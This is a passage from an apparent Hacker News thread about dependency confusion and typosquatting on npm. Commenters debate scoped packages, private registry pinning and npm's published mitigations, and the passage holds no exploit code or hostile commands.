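    "name": "@companyname/mylib",
    "version": "1.0.0",
    "publishConfig": { "registry": "https://registry.example.com/" }
  }

On the consuming side, a single .npmrc line (@companyname:registry=https://registry.example.com/) pins the whole scope to the private registry, so npm never resolves those names against the public one.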

0xbadcafebee

The usual reasons: laziness, ignorance, poor design. Most package managers suck at letting you add 3rd party repos. Most package managers don't have namespaces of any kind. The ones that do have terrible design. Most of them lack a verification system or curation. Most of them have terrible search. None of them seem to have been exposed to hierarchical naming or package inheritance. And a very small number of people understand security in general, many fewer are educated about all the attack classes.

But all of that is why they get popular. Lazy, crappy, easy things are more popular than intentional, complex, harder things. Shitty popular tech wins.

gunnarmorling

In the Java world, you need to prove ownership of a given namespace (group id), e.g. via a TXT record for that domain. Isn't there a similar concept for NPM? The package is named sn4k-s3c/call-home; how will a victim be tricked into referencing that namespace sn4k-s3c (which I suppose is owned by the attacker, not Cursor)? I feel like I'm missing part of the picture here.

hennell

You're not really missing anything so much as adding a misguided assumption of competence to NPM.

Npm doesn't really do namespaces. There's just no ownership to prove, as most packages are published like "call-home", with no namespace required. This gives exciting opportunities for you to register cal-home to trap users who mistype, or caII-home to innocuously add to your own or open source projects or whatever. Fun, isn't it?

In this case the call-home package is namespaced, but the real attack is the packages like "cursor-always-local", which have no namespace and which can sometimes (?) take precedence over a private package with the same name.

It's not a pretty picture, you were better off missing it really.

Vaguely2178

> Npm doesn't really do namespaces.

Yes it really does. npm has namespaces (called scoped packages) and even explicitly encourages their use for private packages to avoid this sort of attack. From the npm docs: "A variant of this attack is when a public package is registered with the same name of a private package that an organization is using. We strongly encourage using scoped packages to ensure that a private package isn’t being substituted with one from the public registry." [1]

> This gives exciting opportunities for you to register cal-home to trap users who miss type, or caII-home to innocuously add to your own or open source projects or whatever. Fun isn't it?

npm actively blocks typo-squatting attacks during the publishing process: "Attackers may attempt to trick others into installing a malicious package by registering a package with a similar name to a popular package, in hopes that people will mistype or otherwise confuse the two. npm is able to detect typosquat attacks and block the publishing of these packages." [1]

This thread is full of people demonstrating the concept of confirmation bias.

[1] https://docs.npmjs.com/threats-and-mitigations

TheRealBrianF

You're referring to what I described previously here... ironically back when the first dependency confusion research was published: https://www.sonatype.com/blog/why-namespacing-matters-in-pub...

gunnarmorling

Thanks, Brian! Big kudos to you and Sonatype for the service you provide to the Java community.